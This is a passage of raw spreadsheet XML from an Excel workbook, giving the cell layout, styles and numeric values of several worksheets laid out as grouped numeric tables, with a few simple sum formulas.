  <pageSetup paperSize="9" scale="80" orientation="landscape" useFirstPageNumber="1" horizontalDpi="200" verticalDpi="300" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="B2:K45"/>
  <sheetViews>
    <sheetView topLeftCell="A4" zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <selection activeCell="C5" sqref="C5:K5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="4.625" customWidth="1"/>
    <col min="2" max="2" width="7.125" customWidth="1"/>
    <col min="3" max="11" width="8.625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:11" ht="18.75">
      <c r="B2" s="5" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="3" spans="2:11" ht="22.5">
      <c r="B3" s="70" t="s">
        <v>23</v>
      </c>
      <c r="C3" s="70"/>
      <c r="D3" s="70"/>
      <c r="E3" s="70"/>
      <c r="F3" s="70"/>
      <c r="G3" s="70"/>
      <c r="H3" s="70"/>
      <c r="I3" s="70"/>
      <c r="J3" s="70"/>
      <c r="K3" s="70"/>
    </row>
    <row r="4" spans="2:11" ht="25.5" customHeight="1">
      <c r="J4" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="5" spans="2:11">
      <c r="B5" s="72" t="s">
        <v>3</v>
      </c>
      <c r="C5" s="82" t="s">
        <v>4</v>
      </c>
      <c r="D5" s="82"/>
      <c r="E5" s="82"/>
      <c r="F5" s="82"/>
      <c r="G5" s="82"/>
      <c r="H5" s="82"/>
      <c r="I5" s="82"/>
      <c r="J5" s="82"/>
      <c r="K5" s="83"/>
    </row>
    <row r="6" spans="2:11" ht="13.5" customHeight="1">
      <c r="B6" s="76"/>
      <c r="C6" s="84" t="s">
        <v>25</v>
      </c>
      <c r="D6" s="73"/>
      <c r="E6" s="74"/>
      <c r="F6" s="84" t="s">
        <v>26</v>
      </c>
      <c r="G6" s="73"/>
      <c r="H6" s="74"/>
      <c r="I6" s="84" t="s">
        <v>27</v>
      </c>
      <c r="J6" s="73"/>
      <c r="K6" s="74"/>
    </row>
    <row r="7" spans="2:11">
      <c r="B7" s="76"/>
      <c r="C7" s="18" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="19" t="s">
        <v>11</v>
      </c>
      <c r="E7" s="20" t="s">
        <v>12</v>
      </c>
      <c r="F7" s="18" t="s">
        <v>10</v>
      </c>
      <c r="G7" s="19" t="s">
        <v>11</v>
      </c>
      <c r="H7" s="20" t="s">
        <v>12</v>
      </c>
      <c r="I7" s="18" t="s">
        <v>10</v>
      </c>
      <c r="J7" s="19" t="s">
        <v>11</v>
      </c>
      <c r="K7" s="20" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="8" spans="2:11">
      <c r="B8" s="14" t="s">
        <v>13</v>
      </c>
      <c r="C8" s="21">
        <v>237</v>
      </c>
      <c r="D8" s="7">
        <v>124</v>
      </c>
      <c r="E8" s="22">
        <v>301</v>
      </c>
      <c r="F8" s="21">
        <v>237</v>
      </c>
      <c r="G8" s="7">
        <v>124</v>
      </c>
      <c r="H8" s="22">
        <v>100</v>
      </c>
      <c r="I8" s="21">
        <v>0</v>
      </c>
      <c r="J8" s="7">
        <v>0</v>
      </c>
      <c r="K8" s="36">
        <v>201</v>
      </c>
    </row>
    <row r="9" spans="2:11">
      <c r="B9" s="14" t="s">
        <v>14</v>
      </c>
      <c r="C9" s="23">
        <v>48</v>
      </c>
      <c r="D9" s="24">
        <v>25</v>
      </c>
      <c r="E9" s="25">
        <v>170</v>
      </c>
      <c r="F9" s="23">
        <v>48</v>
      </c>
      <c r="G9" s="24">
        <v>25</v>
      </c>
      <c r="H9" s="25">
        <v>20</v>
      </c>
      <c r="I9" s="21">
        <v>0</v>
      </c>
      <c r="J9" s="7">
        <v>0</v>
      </c>
      <c r="K9" s="25">
        <v>150</v>
      </c>
    </row>
    <row r="10" spans="2:11">
      <c r="B10" s="14" t="s">
        <v>15</v>
      </c>
      <c r="C10" s="23">
        <v>10</v>
      </c>
      <c r="D10" s="24">
        <v>5</v>
      </c>
      <c r="E10" s="25">
        <v>15</v>
      </c>
      <c r="F10" s="23">
        <v>10</v>
      </c>
      <c r="G10" s="24">
        <v>5</v>
      </c>
      <c r="H10" s="25">
        <v>4</v>
      </c>
      <c r="I10" s="21">
        <v>0</v>
      </c>
      <c r="J10" s="7">
        <v>0</v>
      </c>
      <c r="K10" s="25">
        <v>11</v>
      </c>
    </row>
    <row r="11" spans="2:11">
      <c r="B11" s="14" t="s">
        <v>16</v>
      </c>
      <c r="C11" s="23">
        <v>48</v>
      </c>
      <c r="D11" s="24">
        <v>25</v>
      </c>
      <c r="E11" s="25">
        <v>61</v>
      </c>
      <c r="F11" s="23">
        <v>48</v>
      </c>
      <c r="G11" s="24">
        <v>25</v>
      </c>
      <c r="H11" s="25">
        <v>21</v>
      </c>
      <c r="I11" s="21">
        <v>0</v>
      </c>
      <c r="J11" s="7">
        <v>0</v>
      </c>
      <c r="K11" s="25">
        <v>40</v>
      </c>
    </row>
    <row r="12" spans="2:11">
      <c r="B12" s="14" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="23">
        <v>36</v>
      </c>
      <c r="D12" s="24">
        <v>19</v>
      </c>
      <c r="E12" s="25">
        <v>15</v>
      </c>
      <c r="F12" s="23">
        <v>36</v>
      </c>
      <c r="G12" s="24">
        <v>19</v>
      </c>
      <c r="H12" s="25">
        <v>15</v>
      </c>
      <c r="I12" s="21">
        <v>0</v>
      </c>
      <c r="J12" s="7">
        <v>0</v>
      </c>
      <c r="K12" s="25">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="2:11">
      <c r="B13" s="14" t="s">
        <v>18</v>
      </c>
      <c r="C13" s="23">
        <v>31</v>
      </c>
      <c r="D13" s="24">
        <v>16</v>
      </c>
      <c r="E13" s="25">
        <v>13</v>
      </c>
      <c r="F13" s="23">
        <v>31</v>
      </c>
      <c r="G13" s="24">
        <v>16</v>
      </c>
      <c r="H13" s="25">
        <v>13</v>
      </c>
      <c r="I13" s="21">
        <v>0</v>
      </c>
      <c r="J13" s="7">
        <v>0</v>
      </c>
      <c r="K13" s="25">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="2:11">
      <c r="B14" s="14" t="s">
        <v>19</v>
      </c>
      <c r="C14" s="23">
        <v>45</v>
      </c>
      <c r="D14" s="24">
        <v>24</v>
      </c>
      <c r="E14" s="25">
        <v>19</v>
      </c>
      <c r="F14" s="23">
        <v>45</v>
      </c>
      <c r="G14" s="24">
        <v>24</v>
      </c>
      <c r="H14" s="25">
        <v>19</v>
      </c>
      <c r="I14" s="21">
        <v>0</v>
      </c>
      <c r="J14" s="7">
        <v>0</v>
      </c>
      <c r="K14" s="25">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="2:11">
      <c r="B15" s="14" t="s">
        <v>20</v>
      </c>
      <c r="C15" s="26">
        <v>19</v>
      </c>
      <c r="D15" s="27">
        <v>10</v>
      </c>
      <c r="E15" s="28">
        <v>8</v>
      </c>
      <c r="F15" s="26">
        <v>19</v>
      </c>
      <c r="G15" s="27">
        <v>10</v>
      </c>
      <c r="H15" s="28">
        <v>8</v>
      </c>
      <c r="I15" s="31">
        <v>0</v>
      </c>
      <c r="J15" s="32">
        <v>0</v>
      </c>
      <c r="K15" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="2:11">
      <c r="B16" s="87" t="s">
        <v>3</v>
      </c>
      <c r="C16" s="85" t="s">
        <v>5</v>
      </c>
      <c r="D16" s="85"/>
      <c r="E16" s="85"/>
      <c r="F16" s="85"/>
      <c r="G16" s="85"/>
      <c r="H16" s="85"/>
      <c r="I16" s="85"/>
      <c r="J16" s="85"/>
      <c r="K16" s="86"/>
    </row>
    <row r="17" spans="2:11">
      <c r="B17" s="76"/>
      <c r="C17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="D17" s="29" t="s">
        <v>11</v>
      </c>
      <c r="E17" s="30" t="s">
        <v>12</v>
      </c>
      <c r="F17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="G17" s="29" t="s">
        <v>11</v>
      </c>
      <c r="H17" s="30" t="s">
        <v>12</v>
      </c>
      <c r="I17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="J17" s="29" t="s">
        <v>11</v>
      </c>
      <c r="K17" s="30" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="18" spans="2:11">
      <c r="B18" s="14" t="s">
        <v>13</v>
      </c>
      <c r="C18" s="21">
        <v>577</v>
      </c>
      <c r="D18" s="7">
        <v>462</v>
      </c>
      <c r="E18" s="22">
        <v>720</v>
      </c>
      <c r="F18" s="21">
        <v>577</v>
      </c>
      <c r="G18" s="7">
        <v>462</v>
      </c>
      <c r="H18" s="22">
        <v>370</v>
      </c>
      <c r="I18" s="21">
        <v>0</v>
      </c>
      <c r="J18" s="7">
        <v>0</v>
      </c>
      <c r="K18" s="22">
        <v>350</v>
      </c>
    </row>
    <row r="19" spans="2:11">
      <c r="B19" s="14" t="s">
        <v>14</v>
      </c>
      <c r="C19" s="21">
        <v>75</v>
      </c>
      <c r="D19" s="7">
        <v>60</v>
      </c>
      <c r="E19" s="22">
        <f t="shared" ref="E19:E25" si="0">H19+K19</f>
        <v>98</v>
      </c>
      <c r="F19" s="21">
        <v>75</v>
      </c>
      <c r="G19" s="7">
        <v>60</v>
      </c>
      <c r="H19" s="22">
        <v>52</v>
      </c>
      <c r="I19" s="21">
        <v>0</v>
      </c>
      <c r="J19" s="7">
        <v>0</v>
      </c>
      <c r="K19" s="22">
        <v>46</v>
      </c>
    </row>
    <row r="20" spans="2:11">
      <c r="B20" s="14" t="s">
        <v>15</v>
      </c>
      <c r="C20" s="21">
        <v>70</v>
      </c>
      <c r="D20" s="7">
        <v>56</v>
      </c>
      <c r="E20" s="22">
        <f t="shared" si="0"/>
        <v>88</v>
      </c>
      <c r="F20" s="21">
        <v>70</v>
      </c>
      <c r="G20" s="7">
        <v>56</v>
      </c>
      <c r="H20" s="22">
        <v>46</v>
      </c>
      <c r="I20" s="21">
        <v>0</v>
      </c>
      <c r="J20" s="7">
        <v>0</v>
      </c>
      <c r="K20" s="22">
        <v>42</v>
      </c>
    </row>
    <row r="21" spans="2:11">
      <c r="B21" s="14" t="s">
        <v>16</v>
      </c>
      <c r="C21" s="21">
        <v>115</v>
      </c>
      <c r="D21" s="7">
        <v>93</v>
      </c>
      <c r="E21" s="22">
        <f t="shared" si="0"/>
        <v>145</v>
      </c>
      <c r="F21" s="21">
        <v>115</v>
      </c>
      <c r="G21" s="7">
        <v>93</v>
      </c>
      <c r="H21" s="22">
        <v>75</v>
      </c>
      <c r="I21" s="21">
        <v>0</v>
      </c>
      <c r="J21" s="7">
        <v>0</v>
      </c>
      <c r="K21" s="22">
        <v>70</v>
      </c>
    </row>
    <row r="22" spans="2:11">
      <c r="B22" s="14" t="s">
        <v>17</v>
      </c>
      <c r="C22" s="21">
        <v>86</v>
      </c>
      <c r="D22" s="7">
        <v>70</v>
      </c>
      <c r="E22" s="22">
        <f t="shared" si="0"/>
        <v>107</v>
      </c>
      <c r="F22" s="21">
        <v>86</v>
      </c>
      <c r="G22" s="7">
        <v>70</v>
      </c>
      <c r="H22" s="22">
        <v>54</v>
      </c>
      <c r="I22" s="21">
        <v>0</v>
      </c>
      <c r="J22" s="7">
        <v>0</v>
      </c>
      <c r="K22" s="22">
        <v>53</v>
      </c>
    </row>
    <row r="23" spans="2:11">
      <c r="B23" s="14" t="s">
        <v>18</v>
      </c>
      <c r="C23" s="21">
        <v>110</v>
      </c>
      <c r="D23" s="7">
        <v>93</v>
      </c>
      <c r="E23" s="22">
        <f t="shared" si="0"/>
        <v>135</v>
      </c>
      <c r="F23" s="21">
        <v>110</v>
      </c>
      <c r="G23" s="7">
        <v>93</v>
      </c>
      <c r="H23" s="22">
        <v>70</v>
      </c>
      <c r="I23" s="21">
        <v>0</v>
      </c>
      <c r="J23" s="7">
        <v>0</v>
      </c>
      <c r="K23" s="22">
        <v>65</v>
      </c>
    </row>
    <row r="24" spans="2:11">
      <c r="B24" s="14" t="s">
        <v>19</v>
      </c>
      <c r="C24" s="21">
        <v>63</v>
      </c>
      <c r="D24" s="7">
        <v>47</v>
      </c>
      <c r="E24" s="22">
        <f t="shared" si="0"/>
        <v>79</v>
      </c>
      <c r="F24" s="21">
        <v>63</v>
      </c>
      <c r="G24" s="7">
        <v>47</v>
      </c>
      <c r="H24" s="22">
        <v>40</v>
      </c>
      <c r="I24" s="21">
        <v>0</v>
      </c>
      <c r="J24" s="7">
        <v>0</v>
      </c>
      <c r="K24" s="22">
        <v>39</v>
      </c>
    </row>
    <row r="25" spans="2:11">
      <c r="B25" s="14" t="s">
        <v>20</v>
      </c>
      <c r="C25" s="31">
        <v>58</v>
      </c>
      <c r="D25" s="32">
        <v>43</v>
      </c>
      <c r="E25" s="33">
        <f t="shared" si="0"/>
        <v>68</v>
      </c>
      <c r="F25" s="31">
        <v>58</v>
      </c>
      <c r="G25" s="32">
        <v>43</v>
      </c>
      <c r="H25" s="33">
        <v>33</v>
      </c>
      <c r="I25" s="31">
        <v>0</v>
      </c>
      <c r="J25" s="32">
        <v>0</v>
      </c>
      <c r="K25" s="33">
        <v>35</v>
      </c>
    </row>
    <row r="26" spans="2:11">
      <c r="B26" s="87" t="s">
        <v>3</v>
      </c>
      <c r="C26" s="85" t="s">
        <v>6</v>
      </c>
      <c r="D26" s="85"/>
      <c r="E26" s="85"/>
      <c r="F26" s="85"/>
      <c r="G26" s="85"/>
      <c r="H26" s="85"/>
      <c r="I26" s="85"/>
      <c r="J26" s="85"/>
      <c r="K26" s="86"/>
    </row>
    <row r="27" spans="2:11">
      <c r="B27" s="76"/>
      <c r="C27" s="15" t="s">
        <v>10</v>
      </c>
      <c r="D27" s="29" t="s">
        <v>11</v>
      </c>
      <c r="E27" s="30" t="s">
        <v>12</v>
      </c>
      <c r="F27" s="15" t="s">
        <v>10</v>
      </c>
      <c r="G27" s="29" t="s">
        <v>11</v>
      </c>
      <c r="H27" s="30" t="s">
        <v>12</v>
      </c>
      <c r="I27" s="15" t="s">
        <v>10</v>
      </c>
      <c r="J27" s="29" t="s">
        <v>11</v>
      </c>
      <c r="K27" s="30" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="28" spans="2:11">
      <c r="B28" s="14" t="s">
        <v>13</v>
      </c>
      <c r="C28" s="34">
        <v>132</v>
      </c>
      <c r="D28" s="7">
        <v>110</v>
      </c>
      <c r="E28" s="22">
        <v>17</v>
      </c>
      <c r="F28" s="21">
        <v>132</v>
      </c>
      <c r="G28" s="7">
        <v>110</v>
      </c>
      <c r="H28" s="22">
        <v>17</v>
      </c>
      <c r="I28" s="21">
        <v>0</v>
      </c>
      <c r="J28" s="7">
        <v>0</v>
      </c>
      <c r="K28" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="2:11">
      <c r="B29" s="14" t="s">
        <v>14</v>
      </c>
      <c r="C29" s="21">
        <v>27</v>
      </c>
      <c r="D29" s="7">
        <v>23</v>
      </c>
      <c r="E29" s="22">
        <v>4</v>
      </c>
      <c r="F29" s="21">
        <v>27</v>
      </c>
      <c r="G29" s="7">
        <v>23</v>
      </c>
      <c r="H29" s="22">
        <v>4</v>
      </c>
      <c r="I29" s="21">
        <v>0</v>
      </c>
      <c r="J29" s="7">
        <v>0</v>
      </c>
      <c r="K29" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="2:11">
      <c r="B30" s="14" t="s">
        <v>15</v>
      </c>
      <c r="C30" s="21">
        <v>11</v>
      </c>
      <c r="D30" s="7">
        <v>9</v>
      </c>
      <c r="E30" s="22">
        <v>1</v>
      </c>
      <c r="F30" s="21">
        <v>11</v>
      </c>
      <c r="G30" s="7">
        <v>9</v>
      </c>
      <c r="H30" s="22">
        <v>1</v>
      </c>
      <c r="I30" s="21">
        <v>0</v>
      </c>
      <c r="J30" s="7">
        <v>0</v>
      </c>
      <c r="K30" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="2:11">
      <c r="B31" s="14" t="s">
        <v>16</v>
      </c>
      <c r="C31" s="21">
        <v>24</v>
      </c>
      <c r="D31" s="7">
        <v>20</v>
      </c>
      <c r="E31" s="22">
        <v>3</v>
      </c>
      <c r="F31" s="21">
        <v>24</v>
      </c>
      <c r="G31" s="7">
        <v>20</v>
      </c>
      <c r="H31" s="22">
        <v>3</v>
      </c>
      <c r="I31" s="21">
        <v>0</v>
      </c>
      <c r="J31" s="7">
        <v>0</v>
      </c>
      <c r="K31" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="2:11">
      <c r="B32" s="14" t="s">
        <v>17</v>
      </c>
      <c r="C32" s="21">
        <v>17</v>
      </c>
      <c r="D32" s="7">
        <v>14</v>
      </c>
      <c r="E32" s="22">
        <v>2</v>
      </c>
      <c r="F32" s="21">
        <v>17</v>
      </c>
      <c r="G32" s="7">
        <v>14</v>
      </c>
      <c r="H32" s="22">
        <v>2</v>
      </c>
      <c r="I32" s="21">
        <v>0</v>
      </c>
      <c r="J32" s="7">
        <v>0</v>
      </c>
      <c r="K32" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="2:11">
      <c r="B33" s="14" t="s">
        <v>18</v>
      </c>
      <c r="C33" s="21">
        <v>23</v>
      </c>
      <c r="D33" s="7">
        <v>19</v>
      </c>
      <c r="E33" s="22">
        <v>3</v>
      </c>
      <c r="F33" s="21">
        <v>23</v>
      </c>
      <c r="G33" s="7">
        <v>19</v>
      </c>
      <c r="H33" s="22">
        <v>3</v>
      </c>
      <c r="I33" s="21">
        <v>0</v>
      </c>
      <c r="J33" s="7">
        <v>0</v>
      </c>
      <c r="K33" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="2:11">
      <c r="B34" s="14" t="s">
        <v>19</v>
      </c>
      <c r="C34" s="21">
        <v>17</v>
      </c>
      <c r="D34" s="7">
        <v>14</v>
      </c>
      <c r="E34" s="22">
        <v>2</v>
      </c>
      <c r="F34" s="21">
        <v>17</v>
      </c>
      <c r="G34" s="7">
        <v>14</v>
      </c>
      <c r="H34" s="22">
        <v>2</v>
      </c>
      <c r="I34" s="21">
        <v>0</v>
      </c>
      <c r="J34" s="7">
        <v>0</v>
      </c>
      <c r="K34" s="22">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="2:11">
      <c r="B35" s="14" t="s">
        <v>20</v>
      </c>
      <c r="C35" s="31">
        <v>13</v>
      </c>
      <c r="D35" s="32">
        <v>11</v>
      </c>
      <c r="E35" s="33">
        <v>2</v>
      </c>
      <c r="F35" s="31">
        <v>13</v>
      </c>
      <c r="G35" s="32">
        <v>11</v>
      </c>
      <c r="H35" s="33">
        <v>2</v>
      </c>
      <c r="I35" s="31">
        <v>0</v>
      </c>
      <c r="J35" s="32">
        <v>0</v>
      </c>
      <c r="K35" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="2:11">
      <c r="B36" s="87" t="s">
        <v>3</v>
      </c>
      <c r="C36" s="85" t="s">
        <v>28</v>
      </c>
      <c r="D36" s="85"/>
      <c r="E36" s="85"/>
      <c r="F36" s="85"/>
      <c r="G36" s="85"/>
      <c r="H36" s="85"/>
      <c r="I36" s="85"/>
      <c r="J36" s="85"/>
      <c r="K36" s="86"/>
    </row>
    <row r="37" spans="2:11">
      <c r="B37" s="76"/>
      <c r="C37" s="13" t="s">
        <v>10</v>
      </c>
      <c r="D37" s="16" t="s">
        <v>11</v>
      </c>
      <c r="E37" s="17" t="s">
        <v>12</v>
      </c>
      <c r="F37" s="13" t="s">
        <v>10</v>
      </c>
      <c r="G37" s="16" t="s">
        <v>11</v>
      </c>
      <c r="H37" s="17" t="s">
        <v>12</v>
      </c>
      <c r="I37" s="13" t="s">
        <v>10</v>
      </c>
      <c r="J37" s="16" t="s">
        <v>11</v>
      </c>
      <c r="K37" s="17" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="38" spans="2:11">
      <c r="B38" s="14" t="s">
        <v>13</v>
      </c>
      <c r="C38" s="21">
        <v>946</v>
      </c>
      <c r="D38" s="7">
        <v>696</v>
      </c>
      <c r="E38" s="22">
        <v>1038</v>
      </c>
      <c r="F38" s="21">
        <v>946</v>
      </c>
      <c r="G38" s="7">
        <v>696</v>
      </c>
      <c r="H38" s="22">
        <v>487</v>
      </c>
      <c r="I38" s="21">
        <v>0</v>
      </c>
      <c r="J38" s="7">
        <v>0</v>
      </c>
      <c r="K38" s="22">
        <v>551</v>
      </c>
    </row>
    <row r="39" spans="2:11">
      <c r="B39" s="14" t="s">
        <v>14</v>
      </c>
      <c r="C39" s="21">
        <v>150</v>
      </c>
      <c r="D39" s="7">
        <v>108</v>
      </c>
      <c r="E39" s="22">
        <v>272</v>
      </c>
      <c r="F39" s="21">
        <v>150</v>
      </c>
      <c r="G39" s="7">
        <v>108</v>
      </c>
      <c r="H39" s="22">
        <v>76</v>
      </c>
      <c r="I39" s="21">
        <v>0</v>
      </c>
      <c r="J39" s="7">
        <v>0</v>
      </c>
      <c r="K39" s="22">
        <v>196</v>
      </c>
    </row>
    <row r="40" spans="2:11">
      <c r="B40" s="14" t="s">
        <v>15</v>
      </c>
      <c r="C40" s="21">
        <v>91</v>
      </c>
      <c r="D40" s="7">
        <v>70</v>
      </c>
      <c r="E40" s="22">
        <v>104</v>
      </c>
      <c r="F40" s="21">
        <v>91</v>
      </c>
      <c r="G40" s="7">
        <v>70</v>
      </c>
      <c r="H40" s="22">
        <v>51</v>
      </c>
      <c r="I40" s="21">
        <v>0</v>
      </c>
      <c r="J40" s="7">
        <v>0</v>
      </c>
      <c r="K40" s="22">
        <v>53</v>
      </c>
    </row>
    <row r="41" spans="2:11">
      <c r="B41" s="14" t="s">
        <v>16</v>
      </c>
      <c r="C41" s="21">
        <v>187</v>
      </c>
      <c r="D41" s="7">
        <v>138</v>
      </c>
      <c r="E41" s="22">
        <v>209</v>
      </c>
      <c r="F41" s="21">
        <v>187</v>
      </c>
      <c r="G41" s="7">
        <v>138</v>
      </c>
      <c r="H41" s="22">
        <v>99</v>
      </c>
      <c r="I41" s="21">
        <v>0</v>
      </c>
      <c r="J41" s="7">
        <v>0</v>
      </c>
      <c r="K41" s="22">
        <v>110</v>
      </c>
    </row>
    <row r="42" spans="2:11">
      <c r="B42" s="14" t="s">
        <v>17</v>
      </c>
      <c r="C42" s="21">
        <v>139</v>
      </c>
      <c r="D42" s="7">
        <v>103</v>
      </c>
      <c r="E42" s="22">
        <v>124</v>
      </c>
      <c r="F42" s="21">
        <v>139</v>
      </c>
      <c r="G42" s="7">
        <v>103</v>
      </c>
      <c r="H42" s="22">
        <v>71</v>
      </c>
      <c r="I42" s="21">
        <v>0</v>
      </c>
      <c r="J42" s="7">
        <v>0</v>
      </c>
      <c r="K42" s="22">
        <v>53</v>
      </c>
    </row>
    <row r="43" spans="2:11">
      <c r="B43" s="14" t="s">
        <v>18</v>
      </c>
      <c r="C43" s="21">
        <v>164</v>
      </c>
      <c r="D43" s="7">
        <v>128</v>
      </c>
      <c r="E43" s="22">
        <v>151</v>
      </c>
      <c r="F43" s="21">
        <v>164</v>
      </c>
      <c r="G43" s="7">
        <v>128</v>
      </c>
      <c r="H43" s="22">
        <v>86</v>
      </c>
      <c r="I43" s="21">
        <v>0</v>
      </c>
      <c r="J43" s="7">
        <v>0</v>
      </c>
      <c r="K43" s="22">
        <v>65</v>
      </c>
    </row>
    <row r="44" spans="2:11">
      <c r="B44" s="14" t="s">
        <v>19</v>
      </c>
      <c r="C44" s="21">
        <v>125</v>
      </c>
      <c r="D44" s="7">
        <v>85</v>
      </c>
      <c r="E44" s="22">
        <v>100</v>
      </c>
      <c r="F44" s="21">
        <v>125</v>
      </c>
      <c r="G44" s="7">
        <v>85</v>
      </c>
      <c r="H44" s="22">
        <v>61</v>
      </c>
      <c r="I44" s="21">
        <v>0</v>
      </c>
      <c r="J44" s="7">
        <v>0</v>
      </c>
      <c r="K44" s="22">
        <v>39</v>
      </c>
    </row>
    <row r="45" spans="2:11">
      <c r="B45" s="35" t="s">
        <v>20</v>
      </c>
      <c r="C45" s="31">
        <v>90</v>
      </c>
      <c r="D45" s="32">
        <v>64</v>
      </c>
      <c r="E45" s="33">
        <v>78</v>
      </c>
      <c r="F45" s="31">
        <v>90</v>
      </c>
      <c r="G45" s="32">
        <v>64</v>
      </c>
      <c r="H45" s="33">
        <v>43</v>
      </c>
      <c r="I45" s="31">
        <v>0</v>
      </c>
      <c r="J45" s="32">
        <v>0</v>
      </c>
      <c r="K45" s="33">
        <v>35</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="C26:K26"/>
    <mergeCell ref="C36:K36"/>
    <mergeCell ref="B5:B7"/>
    <mergeCell ref="B16:B17"/>
    <mergeCell ref="B26:B27"/>
    <mergeCell ref="B36:B37"/>
    <mergeCell ref="B3:K3"/>
    <mergeCell ref="C5:K5"/>
    <mergeCell ref="C6:E6"/>
    <mergeCell ref="F6:H6"/>
    <mergeCell ref="I6:K6"/>
    <mergeCell ref="C16:K16"/>
  </mergeCells>
  <phoneticPr fontId="13" type="noConversion"/>
  <pageMargins left="0.69930555555555596" right="0.69930555555555596" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" useFirstPageNumber="1" horizontalDpi="200" verticalDpi="300" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="B2:E15"/>
  <sheetViews>
    <sheetView zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <selection activeCell="C30" sqref="C30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="4.625" customWidth="1"/>
    <col min="2" max="2" width="16" customWidth="1"/>
    <col min="3" max="5" width="20.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:5" ht="18.75">
      <c r="B2" s="5" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="3" spans="2:5" ht="22.5">
      <c r="C3" s="70" t="s">
        <v>30</v>
      </c>
      <c r="D3" s="70"/>
      <c r="E3" s="6"/>
    </row>
    <row r="4" spans="2:5" ht="27.75" customHeight="1">
      <c r="E4" s="9" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="5" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B5" s="10" t="s">
        <v>3</v>
      </c>
      <c r="C5" s="11" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="11" t="s">
        <v>11</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="6" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B6" s="7" t="s">
        <v>13</v>
      </c>
      <c r="C6" s="7">
        <v>260</v>
      </c>
      <c r="D6" s="7">
        <v>500</v>
      </c>
      <c r="E6" s="7">
        <v>1100</v>
      </c>
    </row>
    <row r="7" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B7" s="7" t="s">
        <v>14</v>
      </c>
      <c r="C7" s="12">
        <v>46.8</v>
      </c>
      <c r="D7" s="7">
        <v>90</v>
      </c>
      <c r="E7" s="7">
        <v>198</v>
      </c>
    </row>
    <row r="8" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B8" s="7" t="s">
        <v>15</v>
      </c>
      <c r="C8" s="12">
        <v>33.799999999999997</v>
      </c>
      <c r="D8" s="7">
        <v>65</v>
      </c>
      <c r="E8" s="7">
        <v>143</v>
      </c>
    </row>
    <row r="9" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B9" s="7" t="s">
        <v>16</v>
      </c>
      <c r="C9" s="12">
        <v>59.8</v>
      </c>
      <c r="D9" s="7">
        <v>115</v>
      </c>
      <c r="E9" s="7">
        <v>253</v>
      </c>
    </row>
    <row r="10" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B10" s="7" t="s">
        <v>17</v>
      </c>
      <c r="C10" s="12">
        <v>23.4</v>
      </c>
      <c r="D10" s="7">
        <v>45</v>
      </c>
      <c r="E10" s="7">
        <v>99</v>
      </c>
    </row>
    <row r="11" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B11" s="7" t="s">
        <v>18</v>
      </c>
      <c r="C11" s="12">
        <v>36.4</v>
      </c>
      <c r="D11" s="7">
        <v>70</v>
      </c>
      <c r="E11" s="7">
        <v>154</v>
      </c>
    </row>
    <row r="12" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B12" s="7" t="s">
        <v>19</v>
      </c>
      <c r="C12" s="12">
        <v>33.799999999999997</v>
      </c>
      <c r="D12" s="7">
        <v>65</v>
      </c>
      <c r="E12" s="7">
        <v>143</v>
      </c>
    </row>
    <row r="13" spans="2:5" ht="20.100000000000001" customHeight="1">
      <c r="B13" s="7" t="s">
        <v>20</v>
      </c>
      <c r="C13" s="12">
        <v>26</v>
      </c>
      <c r="D13" s="7">
        <v>50</v>
      </c>
      <c r="E13" s="7">
        <v>110</v>
      </c>
    </row>
    <row r="15" spans="2:5">
      <c r="C15" s="81"/>
      <c r="D15" s="81"/>
